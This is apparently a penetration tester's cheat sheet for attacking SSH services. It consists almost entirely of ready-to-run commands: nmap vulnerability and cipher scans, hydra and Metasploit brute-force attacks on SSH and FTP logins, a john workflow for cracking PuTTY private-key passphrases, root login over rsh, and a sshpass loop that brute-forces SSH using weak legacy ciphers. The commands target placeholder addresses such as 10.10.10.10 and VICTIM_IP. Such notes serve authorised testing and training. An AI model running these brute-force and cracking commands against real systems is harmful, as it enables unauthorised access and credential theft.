NMAP Commands
nmap -sCV -p22 10.10.10.10
#nmap Vuln scan
nmap -sC --script vuln,vulners -Pn -p22 10.10.10.10
#nmap Algorithm enum
#if CBC ciphers or HMAC-based MACs appear in the offered algorithm list --> vulnerable (weak algorithms accepted)
nmap -Pn -sS -sV -p 22 --script ssh2-enum-algos 10.10.10.10
Brute Forcing
hydra -L userx.txt -P wordlist.txt -v VICTIM_IP ssh
hydra -l username -P password_file.txt -s port ssh
Enum via Metasploit
#User Enum --> works only on a few old versions
use auxiliary/scanner/ssh/ssh_enumusers
#Version Detection
use auxiliary/scanner/ssh/ssh_version
#Bruteforcing SSH
use auxiliary/scanner/ssh/ssh_login
#FTP Bruteforce
use auxiliary/scanner/ftp/ftp_login
Cracking SSH Private Key (.ppk)
sudo apt install putty-tools
#Generate id_rsa for ssh login; if it asks for a password, the password needs to be cracked
puttygen private.ppk -O private-openssh -o id_rsa
putty2john private.ppk > hash
john --format=PuTTY --fork=4 hash -w=wordlist.txt
#Enter the cracked password
puttygen private.ppk -O private-openssh -o id_rsa
RSH - Port 514
Older version of SSH; password cannot be used;
- Either use a private key or allow access based on trusted hosts.
- Deprecated
rsh root@10.10.10.10
OLD SSH Ciphers
ssh -oHostKeyAlgorithms=+ssh-dss root@10.10.10.10
#no matching host key type found. Their offer: ssh-rsa,ssh-dss
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss root@10.10.10.10
#Bruteforcing SSH using old ciphers
for username in $(cat /usr/share/wordlists/ssh_usernames.txt); do sshpass -p $username ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss $username@10.10.10.10 & done